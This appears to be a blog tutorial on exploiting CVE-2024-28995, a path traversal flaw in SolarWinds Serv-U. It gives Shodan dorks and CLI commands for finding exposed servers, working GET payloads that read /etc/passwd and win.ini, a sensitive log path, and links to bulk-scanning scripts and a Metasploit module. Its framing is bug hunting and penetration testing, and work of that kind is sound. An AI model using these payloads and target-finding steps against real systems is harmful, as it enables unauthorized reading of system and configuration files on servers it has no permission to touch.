Testing SolarWinds Serv-U Path Directory Transversal Vulnerability (CVE-2024–28995)
It’s been a while since my last publication here. Here i will be explaining SolarWinds Serv-U was susceptible to a directory traversal vulnerability
What is SolarWinds Serv-U ?
SolarWinds Serv-U is a file transfer server that allows you to securely send and receive files between computers on a network. It comes in two editions (Serv-U FTP and Serv-U MFT).
What is SolarWinds Serv-U Path Directory Transversal Vulnerability (CVE-2024–28995)?
It is a directory transversal vulnerability that would allow access to read sensitive files, such as /etc/passwd and other system files, on the system running Serv-U, even if they are not authorized to do so.
It impacts Serv-U 15.4.2 HF 1 and previous versions.
Level of privilege required to exploit the vulnerability :
None, unauthenticated attacker can access and read file systems.
Finding the target
We can use osint like shodan to gather targets that are running SolarWinds Serv-U , this is useful usually if you are working with bug hunting.
Shodan dork:
product:"Serv-U ftpd"
Using shodan CLI
shodan search product:Serv-U ftpd
Check the the result of the impacted version of Serv-U.
For pen-testers, you might customize the search query by adding the target you are testing in the search query via the ssl certificate filter.
Exploiting the vulnerability
The vulnerability is accessed via a GET request to the root (/) and using a parameter named “InternalDir” and “InternalFile” being set to the desired file to read.
A) Manul
The payload used for exploiting in (Linux) :
GET /?InternalDir=\..\..\..\..\etc&InternalFile=passwd
The payload used for exploiting in (Windows) :
GET /?InternalDir=/../../../../windows&InternalFile=win.ini
Tip: to search for targets running server on Windows we can add “os:Windows” to our previous shodan dork that we used to find the target.
After intercepting the GET request using burp, we can add the payload and we will get the result
Note: other sensitive file to read on the vulnerable Serv-U server
/ProgramData/RhinoSoft/Serv-U/Serv-U-StartupLog.txt
(contains startup logs info for the Serv-U FTP server)
B) Automation(scripts)
You can use the following scripts to exploit single or a multiple targets (Bulk scanning) all at once:
https://github.com/bigb0x/CVE-2024-28995
C) Public exploit (Metasploit): gather/solarwinds_servu_fileread_cve_2024_28995
https://sploitus.com/exploit?id=MSF:AUXILIARY-GATHER-SOLARWINDS_SERVU_FILEREAD_CVE_2024_28995-
Happy hunting !
References: